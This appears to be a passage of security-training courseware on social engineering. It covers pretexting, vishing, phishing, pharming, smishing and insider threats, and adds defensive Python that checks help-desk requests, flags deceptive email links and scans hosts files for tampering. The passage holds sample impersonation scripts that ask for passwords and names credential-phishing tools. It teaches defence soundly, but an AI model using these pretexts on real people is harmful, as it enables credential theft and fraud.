Some impersonation tricks that an attacker performs to gather sensitive information about the target organization exploit the human nature of trust, fear, and moral obligation.
Posing as a Legitimate End User
An attacker might impersonate an employee and then resort to deviant methods to gain access to privileged data. They may provide a false identity to obtain sensitive information.
Another example is when a "friend" of an employee asks them to retrieve information that a bedridden employee supposedly needs. There is a well-recognized rule in social interaction that a favor begets a favor, even if the original "favor" is offered without a request from the recipient. This is known as reciprocation. Corporate environments deal with reciprocation daily. Social engineers try to take advantage of this social trait via impersonation.
Example: "Hi! This is John from the finance department. I have forgotten my password. Can I get it?"
Posing as an Important User
Another behavioral factor that aids a social engineer is people's habit of not questioning authority. People often go out of their way for those whom they perceive to have authority. An attacker posing as an important individual such as a vice president or director can often manipulate an unprepared employee. Attackers who take impersonation to a higher level by assuming the identity of an important employee add an element of intimidation. The reciprocation factor also plays a role in this scenario, where lower-level employees might go out of their way to help a higher authority. For example, it is less likely that a help-desk employee will turn down a request from a vice president who is hard-pressed for time and needs some vital information for a meeting. In case an employee refuses to divulge information, social engineers may use authority to intimidate employees and may even threaten to report the employee's misconduct to their supervisors. This technique assumes greater significance when the attacker considers it a challenge to get away with impersonating an authority figure.
Example: "Hi! This is Kevin, the CFO's Secretary. I'm working on an urgent project, and forgot my system password. Can you help me out?"
Posing as a Technical Support Agent
Another technique involves an attacker masquerading as a technical support agent, particularly when the victim is not proficient in technical areas. The attacker may pretend to be a hardware vendor, a technician, or a computer supplier. One demonstration at a hacker meeting had the speaker calling Starbucks and asking its employees whether their broadband connection was properly working. The perplexed employee replied that it was the modem that was giving them trouble. The hacker, without giving any credentials, went on to make him read out the credit card number of the last transaction. In a corporate scenario, the attacker may ask employees to reveal their login information, including their password, to fix a nonexistent problem.
Example: "Sir, this is Mathew, technical support at X Company. Last night we had a system crash here, and we are checking for lost data. Can you give me your ID and password?"
Posing as an Internal Employee, Client, or Vendor
The attacker usually dresses up in business clothes or another suitable uniform. They enter an organization's building while pretending to be a contractor, client, service personnel, or another authorized person. Then they roam around unnoticed and look for passwords stuck on terminals, extract critical data from wastepaper bins and papers lying on desks, and perform other information gathering. The attacker may also implement other social engineering techniques such as shoulder surfing (observing users typing login credentials or other sensitive information) and eavesdropping (purposely overhearing confidential conversations between employees) to gather sensitive information that might help launch an attack on the organization.
Repairman
Computer technicians, electricians, and telephone repairpersons are generally unsuspected people. Attackers might impersonate a technician or repair person and enter the organization. They perform normal activities associated with their assumed duty while looking for hidden passwords, critical information on desks, information in trash bins, and other useful information; they sometimes even plant snooping devices in hidden locations.
Impersonation (Vishing)
Vishing (voice or VoIP phishing) is an impersonation technique in which the attacker uses Voice over IP (VoIP) technology to trick individuals into revealing their critical financial and personal information and uses the information for financial gain. The attacker uses caller ID spoofing to forge identification. In many cases, vishing includes pre-recorded messages and instructions resembling a legitimate financial institution. Through vishing, the attacker tricks the victim into providing bank account or credit card details for identity verification over the phone.
The attacker may send a fake SMS or email message to the victim, asking the victim to call the financial institution for credit card or bank account verification. In some cases, the victim receives a voice call from the attacker. When the victim calls the number listed in the message or receives the attacker's call, they hear recorded instructions that insist they provide personal and financial information like name, date of birth, social security number, bank account numbers, credit card numbers, or credentials like usernames and passwords. Once the victim provides the information, the recorded message confirms verification of the victim's account.
Discussed below are some tricks attackers use when vishing to gather sensitive information:
Abusing the Over-Helpfulness of the Help Desk
Help desks are frequently targeted for social engineering attacks for a reason. The staff members are trained to be helpful, and they often give away sensitive information such as passwords and network information without verifying the authenticity of the caller. To be effective, the attacker should know employees' names and have details about the person they are trying to impersonate. The attacker may call a company's help desk pretending to be a senior official to try to extract sensitive information out of the help desk.
Example: A man calls a company's help desk and says he has forgotten his password. He adds that if he misses the deadline on a big advertising project, his boss might fire him. The help desk worker feels sorry for him and quickly resets the password, unwittingly giving the attacker entrance into the corporate network.
Third-party Authorization
Another popular technique used by an attacker is to represent themself as an agent authorized by some senior authority in an organization to obtain information on their behalf.
For instance, when an attacker knows the name of the employee in the target organization authorized to access the required information, they keep a vigil on them so that they can access the required data in the absence of the concerned employee. In this case, the attacker can approach the help desk or other personnel in the company claiming that the employee (authority figure) has requested the information. Even though there might be suspicion attached to the authenticity of the request, people tend to overlook this in favor of being helpful in the workplace. People tend to believe that others are being honest when they reference an important person, and provide the required information.
This technique is particularly effective when the authority figure is on vacation or traveling, making instant verification impossible.
Example: "Hi, I am John. I spoke with Mr. XYZ last week before he went on vacation and he said that you would be able to provide me with the information in his absence. Could you help me out?"
Tech Support
Like the impersonation of a tech support agent above, an attacker can use vishing to pretend to be a technical support staff member of the target organization's software vendor or contractor to obtain sensitive information. The attacker may pretend to troubleshoot a network problem and ask for the user ID and password of a computer to detect the problem. Believing them to be a troubleshooter, the user would provide the required information.
Example:
Attacker: "Hi, this is Mike from tech support. Some folks in your office have reported a slowdown in logging. Is this true?"
Employee: "Yes, it has seemed slow lately."
Attacker: "Well, we have moved you to a new server, and your service should be much better now. If you want to give me your password, I can check your service. Things will be better from now on."
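Each vishing example in this section (the forgotten password with a sob story, the "Mr. XYZ said you would help me" request, the tech-support caller asking for a password) succeeds because the help desk acts on the caller's story. The following is an added example, not the courseware's own material: a minimal help-desk decision routine in which caller ID and the stated reason never shorten verification, a request on someone else's behalf needs a ticket approved by the account owner's manager, and the only positive outcome is a reset delivered to the contact of record, never a password read out. The directory, ticket scheme, cue list, and scenarios are constructed assumptions for this example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directory of record, constructed for this example. The callback number and
# manager come from HR data, never from what the caller says.
DIRECTORY = {
    "jsmith": {"callback": "+1-555-0100", "manager": "mlee"},
    "mlee": {"callback": "+1-555-0101", "manager": "cfo"},
}

# Story elements that recur in the examples above. Constructed list; they are
# logged for review and never change the verification steps.
PRESSURE_CUES = ("fire me", "urgent", "deadline", "cfo", "on vacation", "right now")


@dataclass
class ResetRequest:
    account: str                           # account the caller wants reset
    requested_by: str                      # who the caller claims to be
    caller_id: str                         # telephony caller ID; spoofable, so never trusted
    stated_reason: str
    callback_done: bool = False            # desk called the number of record and reached the owner
    approval_ticket: Optional[str] = None  # ticket from the account owner's manager (third-party requests)


def pressure_signals(reason: str) -> List[str]:
    """Cues in the caller's story that would tempt staff to skip a step."""
    low = reason.lower()
    return [cue for cue in PRESSURE_CUES if cue in low]


def evaluate(req: ResetRequest, directory=DIRECTORY) -> Tuple[str, str]:
    """Decide what the help desk may do for one request.

    Returns (action, detail) with action one of 'deny', 'approval_required',
    'callback_required' or 'reset'. No branch ever discloses a password; the
    only positive outcome is a reset sent to the contact of record.
    """
    record = directory.get(req.account)
    if record is None:
        return "deny", "no such account"
    if req.requested_by != req.account and not req.approval_ticket:
        # "Mr. XYZ said you would help me" is a claim, not an authorization.
        return "approval_required", f"needs a ticket approved by {record['manager']}"
    if not req.callback_done:
        # A caller ID equal to the number of record proves nothing; the desk
        # must place the call to that number itself.
        return "callback_required", f"call back {record['callback']} before acting"
    return "reset", f"issue reset to contact of record {record['callback']}"


# Constructed scenarios modelled on the examples in this section.
SCENARIOS = {
    "sob_story": ResetRequest(
        account="jsmith", requested_by="jsmith", caller_id="+1-555-0100",
        stated_reason="I forgot my password and if I miss the deadline on the "
                      "advertising project my boss might fire me.",
    ),
    "third_party": ResetRequest(
        account="mlee", requested_by="john", caller_id="+1-555-0142",
        stated_reason="I spoke with Mr. Lee before he went on vacation and he "
                      "said you could give me the information in his absence.",
    ),
    "verified": ResetRequest(
        account="jsmith", requested_by="jsmith", caller_id="+1-555-0100",
        stated_reason="Locked out after a laptop rebuild.", callback_done=True,
    ),
}

if __name__ == "__main__":
    for name, req in SCENARIOS.items():
        print(name, evaluate(req), pressure_signals(req.stated_reason))
```

The sob story gets "callback_required" even though its caller ID matches the number on record, the third-party request gets "approval_required", and only the request whose owner was reached by a desk-initiated callback gets a reset. The pressure cues are returned separately so they can be recorded for the security team without ever feeding into the decision.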
Trusted Authority Figure
The most effective method of social engineering is posing as a trusted authority figure. An attacker might pretend to be a fire marshal, superintendent, auditor, director, or other important figure over the phone or in person to obtain sensitive information from the target.
Example:
1. "Hi, I am John Brown. I'm with the external auditor, Arthur Sanderson. We've been requested by the corporate to do a surprise inspection of your disaster recovery procedures. Your department has 10 minutes to show me how you would recover from a website crash."
2. "Hi, I'm Sharon, a sales rep out of the New York office. I know this is short notice, but I have a group of prospective clients out in the car, and I've been trying to get them to outsource their security training needs to us for months. They're located just a few miles away, and I think that if I can give them a quick tour of our facilities, it would be enough to push them over the edge and get them to sign up. Oh yeah, they are particularly interested in what security precautions we've adopted. It seems someone hacked into their website a while back, which is one of the reasons they're considering our company."
3. "Hi, I'm with Aircon Express Services. We received a call that the computer room is getting too warm, so I need to check your HVAC system." Using professional-sounding terms like HVAC (Heating, Ventilation, and Air Conditioning) may add just enough credibility to an intruder's masquerade to allow them to access the targeted secured resource.

Eavesdropping
Eavesdropping refers to an unauthorized person listening to a conversation or reading others' messages. It includes the interception of any form of communication, including audio, video, or written, using channels such as telephone lines, email, and instant messaging. An attacker can obtain sensitive information such as passwords, business plans, phone numbers, and addresses.
Shoulder Surfing
Shoulder surfing is the technique of looking over someone's shoulder as they key information into a device. Attackers use shoulder surfing to find out passwords, personal identification numbers, account numbers, and other information. They sometimes even use binoculars and other optical devices or install small cameras to record the actions performed on the victim's system to obtain login details and other sensitive information.
Dumpster Diving
Dumpster diving is the process of retrieving sensitive personal or organizational information by searching through trash bins. Attackers can extract confidential data such as user IDs, passwords, policy numbers, network diagrams, account numbers, bank statements, salary data, source code, sales forecasts, access codes, phone lists, credit card numbers, calendars, and organizational charts on paper or disk. Attackers can then use this information to perform various malicious activities. Sometimes attackers even use pretexts to support their dumpster diving initiatives, such as impersonating a repair person, technician, cleaner, or other legitimate worker.
Information that attackers can obtain by searching through trash bins includes:
- Phone lists: Disclose employees' names and contact numbers.
- Organizational charts: Disclose details about the structure of the company, physical infrastructure, server rooms, restricted areas, and other organizational data.
- Email printouts, notes, faxes, and memos: Reveal personal details of an employee, passwords, contacts, inside working operations, certain useful instructions, and other data.
- Policy manuals: Reveal information regarding employment, system use, and operations.
- Event notes, calendars, or computer use logs: Reveal information regarding the user's log on and off timings, which helps the attacker to decide on the best time to plan their attack.
Reverse Social Engineering
Generally, reverse social engineering is difficult to carry out. This is primarily because its execution needs a lot of preparation and skills. In reverse social engineering, a perpetrator assumes the role of a knowledgeable professional so that the organization's employees ask them for information. The attacker usually manipulates questions to draw out the required information.
First, the social engineer will cause an incident, creating a problem, and then present themself as the problem solver through general conversation, encouraging employees to ask questions. For example, an employee may ask how this problem has affected files, servers, or equipment. This provides pertinent information to the social engineer. Many different skills and experiences are required to carry out this tactic successfully. Provided below are some of the techniques involved in reverse social engineering:
- Sabotage: Once the attacker gains access, they will corrupt the workstation or make it appear corrupted. Under such circumstances, users seek help as they face problems.
- Marketing: To ensure that the user calls the attacker, the attacker must advertise. The attacker can do this either by leaving their business card in the target's office or by placing their contact number on the error message itself.
- Support: Even if the attacker has already acquired the desired information, they may continue to assist the users so that they remain ignorant of the hacker's identity.
A good example of a reverse social engineering virus is the "MyParty" worm. This virus does not rely on sensational subject lines but rather makes use of inoffensive and realistic names for its attachments. By using realistic words, the attacker gains the user's trust, confirms the user's ignorance, and completes the task of information gathering.
Piggybacking
Piggybacking usually implies entry into a building or security area with the consent of the authorized person. For example, an attacker might request an authorized person to unlock a security door, saying that they have forgotten their ID badge. In the interest of common courtesy, the authorized person will allow the attacker to pass through the door.
Tailgating
Tailgating implies accessing a building or secured area without the consent of the authorized person. It is the act of following an authorized person through a secure entrance, as a polite user would open and hold the door for those following them. An attacker, wearing a fake badge, might attempt to enter the secured area by closely following an authorized person through a door that requires key access. They then try to enter the restricted area while pretending to be an authorized person.
Diversion Theft
Diversion theft is a technique where attackers target delivery professionals or transport companies. This technique is also known as "Round the Corner Game" or "Corner Game." The main objective of this technique is to trick a person responsible for making a genuine delivery into delivering the consignment to the wrong location, thus interrupting the transaction. For example, if the victim is a van driver delivering a package, then that person would be persuaded to drive to a location other than the actual delivery location. Subjecting the van driver to a series of social engineering tricks thus allows the theft to be successful.
Diversion theft can also be practiced by social engineers on the Internet; victims can be persuaded to send sensitive or confidential files to some unassociated person who is not intended to receive them.
Honey Trap
The honey trap is a technique where an attacker targets a person online by pretending to be an attractive person and then begins a fake online relationship to obtain confidential information about the target company. In this technique, the victim is an insider who possesses critical information about the target organization.
Baiting
Baiting is a technique in which attackers offer end users something alluring in exchange for important information such as login details and other sensitive data. This technique relies on the curiosity and greed of the end-users. Attackers perform this technique by leaving a physical device such as a USB flash drive containing malicious files in locations where people can easily find them, such as parking lots, elevators, and bathrooms. This physical device is labeled with a legitimate company's logo, thereby tricking end-users into trusting it and opening it on their systems. Once the victim connects and opens the device, a malicious file downloads. It infects the system and allows the attacker to take control.
For example, an attacker leaves some bait in the form of a USB drive in the elevator with the label "Employee Salary Information 2019" and a legitimate company's logo. Out of curiosity and greed, the victim picks up the device and opens it up on their system, which downloads the bait. Once the bait is downloaded, a piece of malicious software installs on the victim's system, giving the attacker access.
Quid Pro Quo
Quid pro quo is a Latin phrase meaning "something for something." In this technique, attackers keep calling random numbers within a company, claiming to be calling from technical support. This is a baiting technique where attackers offer their service to end-users in exchange for confidential data or login credentials.
For example, an attacker gathers random phone numbers of the employees of a target organization. They then start calling each number, pretending to be from the IT department. The attacker eventually finds someone with a genuine technical issue and offers their service to resolve it. The attacker can then ask the victim to follow a series of steps and to type in specific commands to install and launch malicious files that contain malware designed to collect sensitive information.
Elicitation
Elicitation is the technique of extracting specific information from the victim by involving them in normal and disarming conversations. In this technique, attackers must possess good social skills to take advantage of professional or social opportunities to communicate with persons who have access to sensitive information. In social engineering, the purpose of elicitation is to extract relevant information to gain access to the target assets.
For example, if an attacker's objective is to obtain the victim's username and password and the conversation with them only yields things that they like, then the attacker must work more on the elicitation process to extract the relevant information.

Computer-based Social Engineering
[Slide: Pop-Up Windows; Hoax Letters; Chain Letters; Instant Chat Messenger; Spam Email]
Attackers perform computer-based social engineering using various malicious applications such as viruses, trojans, and spyware, and software programs such as email and instant messaging. Discussed below are types of computer-based social engineering attacks:
Pop-Up Windows
Pop-ups trick or compel users into clicking a hyperlink that redirects them to fake web pages asking for personal information or downloading malicious programs such as keyloggers, trojans, or spyware.
The common method of enticing a user to click a button in a pop-up window is by warning of a problem, such as displaying a realistic operating system or application error message, or by offering additional services. A window appears on the screen requesting the user to re-login or warning about an interruption in the host connection, and that the network connection needs re-authentication. When the user follows these instructions, a malicious program installs, extracts the target's sensitive information, and sends it to the attacker's email address or a remote site. This type of attack uses trojans and viruses.

Examples of pop-ups used for tricking users:
[Figure 9.2: Screenshots showing sample pop-up windows]
Hoax Letters
A hoax is a message warning its recipients of a non-existent computer virus threat. It relies on social engineering to spread its reach. Usually, hoaxes do not cause any physical damage or loss of information, but they cause a loss of productivity and use an organization's valuable network resources.
Chain Letters
A chain letter is a message offering free gifts, such as money and software, on the condition that the user forwards the email to a predetermined number of recipients. Common approaches used in chain letters are emotionally convincing stories, "get-rich-quick" pyramid schemes, spiritual beliefs, and superstitious threats of bad luck to the recipient if they "break the chain" and fail to pass on the message or simply refuse to read its content. Chain letters also rely on social engineering to spread.

Instant Chat Messenger
An attacker chats with selected online users via instant chat messengers and tries to gather their personal information such as date of birth or maiden name. They then use the acquired information to crack users' accounts.
Spam Email
Spam is irrelevant, unwanted, and unsolicited email designed to collect financial information such as social security numbers, and network information. Attackers send spam messages to the target to collect sensitive information, such as bank details. Attackers may also send email attachments with hidden malicious programs such as viruses and trojans. Social engineers try to hide the file extension by giving the attachment a long filename.
Scareware
Scareware is a type of malware that tricks computer users into visiting malware-infested websites or downloading or buying potentially malicious software. Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. These pop-ups convincingly appear as though they are coming from a legitimate source such as an antivirus company. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.

Computer-based Social Engineering: Phishing
[Slide: phishing overview; Types of Phishing: Spear Phishing, Whaling, Pharming, Spimming]
Phishing
Phishing is a technique in which an attacker sends an email or provides a link falsely claiming to be from a legitimate site to acquire a user's personal or account information. The attacker registers a fake domain name, builds a lookalike website, and then mails the fake website's link to users. When a user clicks on the email link, it redirects them to the fake webpage, where they are lured into sharing sensitive details such as their address and credit card information.
Some of the reasons behind the success of phishing scams include users' lack of knowledge, being visually deceived, and not paying attention to security indicators.
The screenshot below is an example of an illegitimate email that claims to be from a legitimate sender. The email link redirects users to a fake webpage and asks them to submit their personal or financial details.

[Figure: Screenshot showing the phishing technique]
Examples of Phishing Emails
Source: https://its.tntech.edu
Today, most people use internet banking. Many people use Internet banking for all their financial needs, such as online share trading and e-commerce. Phishing involves fraudulently acquiring sensitive information (like passwords and credit card details) by masquerading as a trusted entity.
The target receives an email that appears to be from the bank and requests the user to click on the URL or the link provided. If the user is tricked and provides their username, password, and other information, then the site forwards the information to the attacker, who will use it for nefarious purposes.
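The link trick these emails rely on (visible text showing the bank's site while the href points elsewhere) can be checked mechanically before a user clicks. The following Python script is an added example, not code from the courseware: it extracts every anchor from an email's HTML body and flags links whose destination host is outside the organization's own domain or disagrees with the host named in the visible text. The trusted domain, the lookalike domain and the email body are constructed for the example.

```python
"""Flag phishing-style links in an email body (added example, not courseware code)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for this example: the organization's legitimate domain.
TRUSTED_DOMAIN = "xim-bank.example"

# Constructed sample: a phishing email whose link text shows the real site
# while the href points at a lookalike domain.
SAMPLE_EMAIL = """
<p>Dear Valued Customer,</p>
<p>We detected unusual activity on your account. Please confirm at
<a href="http://xim-bank.example.security-checkpoint.test/login">
https://www.xim-bank.example/login</a> within 24 hours.</p>
<p>Questions? <a href="https://help.xim-bank.example/contact">Contact us</a></p>
"""


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []      # each entry is a mutable [href, text] pair
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href", ""), ""]
            self.links.append(self._current)

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a":
            self._current = None


def extract_links(html):
    """Return (href, visible_text) pairs with whitespace in the text collapsed."""
    parser = _AnchorCollector()
    parser.feed(html)
    return [(href, " ".join(text.split())) for href, text in parser.links]


def hostname_of(value):
    """Hostname of a URL, or of bare text such as 'www.example.com'; '' if none."""
    parsed = urlparse(value if "://" in value else "//" + value)
    return (parsed.hostname or "").lower()


def looks_like_url(text):
    """True when the visible text itself names a host (no spaces, has a dot)."""
    return " " not in text and "." in text and hostname_of(text) != ""


def belongs_to(host, domain):
    """True when host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)


def suspicious_links(html, trusted=TRUSTED_DOMAIN):
    """Return (href, visible_text, reasons) for each link a reader should not trust."""
    findings = []
    for href, text in extract_links(html):
        href_host = hostname_of(href)
        reasons = []
        # A genuine notification from the bank links to the bank's own domain;
        # "xim-bank.example.security-checkpoint.test" is not a subdomain of it.
        if not belongs_to(href_host, trusted):
            reasons.append("href host is outside the trusted domain")
        # Visible URL text that disagrees with the actual destination.
        if looks_like_url(text) and hostname_of(text) != href_host:
            reasons.append("visible text names a different host than the href")
        if reasons:
            findings.append((href, text, reasons))
    return findings
```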

[Figure 9.3: Screenshot showing a phishing email ("Activity Alert" / "Security Checkpoint" lure)]
[Figure 9.4: Screenshot showing a phishing email (Tennessee Tech Job Placement & Student Services "Secret Shopper" lure)]
Types of Phishing
Spear Phishing
Instead of sending out thousands of emails, some attackers opt for "spear phishing" and use specialized social engineering content directed at a specific employee or small group of employees in an organization to steal sensitive data such as financial information and trade secrets. Spear phishing messages seem to come from a trusted source with an official-looking website. The email also appears to be from an individual from the recipient's company, generally someone in a position of authority. In reality, the message is sent by an attacker attempting to obtain critical information about a specific recipient and their organization, such as login credentials, credit card details, bank account numbers, confidential passwords, documents, financial information, and trade secrets. Spear phishing generates a higher response rate compared to a normal phishing attack, as it appears to be from a trusted company source.
Whaling
A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information. It is a social engineering trick in which the attacker tricks the victim into revealing critical corporate and personal information (like bank account details, employee details, customer information, and credit card details), generally through email or website spoofing. Whaling is different from a normal phishing attack; the email or website used for the attack is carefully designed, usually targeting someone in the executive leadership.
Pharming
Pharming is a social engineering technique in which the attacker executes malicious programs on a victim's computer or server, and when the victim enters any URL or domain name, it automatically redirects the victim's traffic to an attacker-controlled website. This attack is also known as "Phishing without a Lure." The attacker steals confidential information like credentials, banking details, and other information related to web-based services.
Pharming attack can be performed in two ways: DNS Cache Poisoning and Host File Modification.
DNS Cache Poisoning:
o The attacker performs DNS Cache Poisoning on the targeted DNS server.
o The attacker modifies the IP address of the target website "www.targetwebsite.com" to that of a fake website "www.hackerwebsite.com."
o When the victim enters the target website's URL in the browser's address bar, a request is sent to the DNS server to obtain the IP address of the target website.
o The DNS server returns a fake IP address that is already modified by the attacker.
o Finally, the victim is redirected to the fake website.
Host File Modification:
o An attacker sends a malicious code as an email attachment.
o When the user clicks on the attachment, the code executes and modifies local host files on the user's computer.
o When the victim enters the target website's URL in the browser's address bar, the compromised host file automatically redirects the user's traffic to the fraudulent website controlled by the hacker.
Pharming attacks can also be performed using malware like Trojan horses or worms.
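Host File Modification leaves a visible trace: an extra line in the local hosts file mapping a sensitive domain to an address the organization does not own, and the resolver consults that file before DNS. The following Python script is an added example, not code from the courseware: it parses hosts-file content and flags any entry that overrides a watched domain (or one of its subdomains) with a non-loopback address. The watched domains, the sample hosts content and the IP addresses are constructed for the example.

```python
"""Detect pharming-style overrides in a hosts file (added example, not courseware code)."""
import ipaddress
import os
import sys

# Constructed sample: a hosts file as it might look after tampering.
SAMPLE_HOSTS = """\
# Standard entries
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.1.10    intranet.example.internal   # legitimate internal host (constructed)

# Lines appended by malware (constructed for this example)
203.0.113.45    www.targetwebsite.com
203.0.113.45    targetwebsite.com login.targetwebsite.com
"""

# Assumption for this example: the defender maintains a list of domains
# (banks, SSO portals, mail) that must always be resolved through DNS.
WATCHED_DOMAINS = {"targetwebsite.com"}

# Mapping a watched domain to loopback is a deliberate block, not pharming.
LOOPBACK_OK = {"127.0.0.1", "::1", "0.0.0.0"}


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text, ignoring comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(ip)            # skip malformed lines
        except ValueError:
            continue
        for name in names:
            entries.append((ip, name.lower()))
    return entries


def is_watched(hostname, watched):
    """True when hostname is a watched domain or a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in watched)


def find_pharming_entries(text, watched=None):
    """Return hosts entries that redirect a watched domain to a non-loopback IP."""
    watched = WATCHED_DOMAINS if watched is None else watched
    return [(ip, name) for ip, name in parse_hosts(text)
            if is_watched(name, watched) and ip not in LOOPBACK_OK]


def system_hosts_path():
    """Platform default location of the hosts file."""
    if sys.platform.startswith("win"):
        system_root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(system_root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def check_system_hosts():
    """Scan the live hosts file; returns the flagged entries (empty if clean)."""
    with open(system_hosts_path(), encoding="utf-8", errors="replace") as fh:
        return find_pharming_entries(fh.read())


if __name__ == "__main__":
    for ip, name in find_pharming_entries(SAMPLE_HOSTS):
        print(f"hosts override for {name} -> {ip}")
```

Running the script prints the three constructed overrides; `check_system_hosts()` applies the same check to the real file on the machine it runs on.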

Spimming
SPIM (Spam over Instant Messaging) exploits Instant Messaging platforms and uses IM as a tool to spread spam. A person who generates spam over IM is called a Spimmer. Spimmers generally make use of bots (an application that executes automated tasks over the network) to harvest Instant Message IDs and forward spam messages to them. SPIM messages, like email spam, generally include advertisements and malware as an attachment or embedded hyperlink. The user clicks the attachment and is redirected to a malicious website that collects financial and personal information like credentials, bank account, and credit card details.

Phishing Tools
Phishing tools can be used by attackers to generate fake login pages to capture usernames and passwords, send spoofed emails, and obtain the victim's IP address and session cookies. This information can further be used by the attacker, who will use it to impersonate a legitimate user and launch further attacks on the target organization.
+ ShellPhish
Source: https://github.com
ShellPhish is a phishing tool used to phish user credentials from various social networking platforms such as Instagram, Facebook, Twitter, and LinkedIn. It also displays the victim system's public IP address, browser information, hostname, geolocation, and other information.

[Figure 9.6: Screenshot of ShellPhish]
[Figure: Screenshot showing the output of ShellPhish]
Some additional phishing tools are listed below:
+ BLACKEYE (https://github.com)
+ PhishX (https://github.com)
+ Modlishka (https://github.com)
+ Trape (https://github.com)
+ Evilginx (https://github.com)

Mobile-based Social Engineering: Publishing Malicious Apps and Repackaging Legitimate Apps
[Slide: Publishing Malicious Apps; Repackaging Legitimate Apps]
Publishing Malicious Apps
In mobile-based social engineering, the attacker performs a social engineering attack using malicious mobile apps. The attacker first creates a malicious application with attractive features, such as a gaming application, and publishes it on major application stores using popular names. Unaware of the malicious application, a user will download it onto their mobile device, believing it to be genuine. Once the application is installed, the device is infected by malware that sends the user's credentials (usernames, passwords), contact details, and other information to the attacker.

[Figure: Publishing malicious apps (attacker; malicious gaming application; app store; clients install the malicious app)]
Repackaging Legitimate Apps
Sometimes malware can be hidden within legitimate apps. A legitimate developer creates legitimate gaming applications. Platform vendors create centralized marketplaces to allow mobile users to conveniently browse and install these games and apps. Usually, developers submit gaming applications to these marketplaces, making them available to thousands of mobile users. A malicious developer downloads a legitimate game, repackages it with malware, and uploads it to the third-party application store. Once a user downloads the malicious application, the malicious program installed on the user's mobile device collects the user's information and sends it to the attacker.
[Figure 9.9: Repackaging legitimate apps (legitimate developer; malicious developer uploads the malicious app to a third-party app store; end user downloads the malicious gaming app)]
Mobile-based Social Engineering: Fake Security Applications
Fake Security Applications
Attackers may send a fake security application to perform mobile-based social engineering. In this attack, the attacker first infects the victim's computer by sending something malicious. They then upload a malicious application to an app store. When the victim logs on to their bank account, the malware in the system displays a pop-up message telling the victim that they need to download an application on their phone to receive a message from security. The victim downloads the application from the attacker's app store, believing they are downloading a genuine app. Once the user downloads the application, the attacker obtains confidential information such as bank account login credentials (username and password), whereupon a second authentication is sent by the bank to the victim via SMS. Using that information, the attacker accesses the victim's bank account.

[Figure 9.10: Fake security applications (user logs on to their bank account; a message appears telling the user to download an application to their phone; user credentials are sent to the attacker)]
Mobile-based Social Engineering: SMiShing (SMS Phishing)
SMiShing (SMS Phishing)
Sending SMS is another technique used by attackers in performing mobile-based social engineering. In SMiShing (SMS Phishing), the SMS text messaging system is used to lure users into taking instant action such as downloading malware, visiting a malicious webpage, or calling a fraudulent phone number. SMiShing messages are crafted to provoke an instant action from the victim, requiring them to divulge their personal information and account details.
Consider Tracy, a software engineer working in a reputed company. She receives an SMS ostensibly from the security department of XIM Bank. It claims to be urgent, and the message says that Tracy should call the phone number listed in the SMS immediately. Worried, she calls to check on her account, believing it to be an authentic XIM Bank customer service phone number. A recorded message asks Tracy to provide her credit or debit card number, as well as her password. Tracy believes it is a genuine message and shares the sensitive information.
Sometimes a message claims that the user has won money or has been randomly selected as a lucky winner and that they merely need to pay a nominal fee and share their email address, contact number, or other information.

[Figure 9.11: SMiShing (SMS Phishing)]
Module Flow
[Slide: Social Engineering Concepts; Social Engineering Techniques; Insider Threats; Impersonation on Social Networking Sites; Identity Theft; Countermeasures]
Insider Threats/Insider Attacks
[Slide: insider attacks performed by an employee or contractor; reasons for insider attacks: steal confidential data, revenge, become future competitor, perform competitor's bidding]
Insider Threats
An insider is any employee (trusted person) who has access to the critical assets of an organization. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. Insider attacks may cause great loss to the company. Further, they are dangerous because they are easy to launch and difficult to detect.

Insider attacks are generally performed by:
+ Privileged Users: Attacks may come from the most trusted employees of the company, such as managers and system administrators, who have access to the company's confidential data and a higher probability of misusing the data, either intentionally or unintentionally.
+ Disgruntled Employees: Attacks may come from unhappy employees or contract workers. Disgruntled employees, who intend to take revenge on the company, first acquire information and then wait for the right time to compromise the organization's resources.
+ Terminated Employees: Some employees take valuable information about the company with them when terminated. These employees access the company's data after termination using backdoors, malware, or their old credentials if they are not disabled.
+ Accident-Prone Employees: If an employee accidentally loses their mobile device, sends an email to incorrect recipients, or leaves a system loaded with confidential data logged-in, it can lead to unintentional data disclosure.
+ Third Parties: Third parties, like remote employees, dealers, partners, and vendors, have access to the company's information. However, the security of their systems is unpredictable and could be a source of information leaks.
+ Undertrained Staff: A trusted employee becomes an unintentional insider due to a lack of cybersecurity training. They fail to adhere to cybersecurity policies, procedures, guidelines, and best practices.
Companies in which insider attacks are common include credit card companies, health-care companies, network service providers, as well as financial and exchange service providers.

Reasons for Insider Attacks
+ Financial Gain
An attacker performs an insider attack mainly for financial gain. The insider sells the company's sensitive information to its competitor, steals a colleague's financial details for personal use, or manipulates the company's financial records or that of its personnel.
+ Steal Confidential Data
A competitor may inflict damage upon the target organization, steal critical information, or even put them out of business just by finding a job opening, preparing someone to get through the interview, and having that person hired by the competitor.
+ Revenge
It only takes one disgruntled person to seek revenge, and the company is compromised. Attacks may come from unhappy employees or contract workers with negative opinions about the company.
+ Become Future Competitor
Current employees may plan to start their own competing business and, by using the company's confidential data, these employees may access the system to steal or alter the company's client list.
+ Perform Competitors' Bidding
Due to corporate espionage, even the most honest and trustworthy employees can be coerced into revealing the company's critical information through bribery or blackmail.
+ Public Announcement
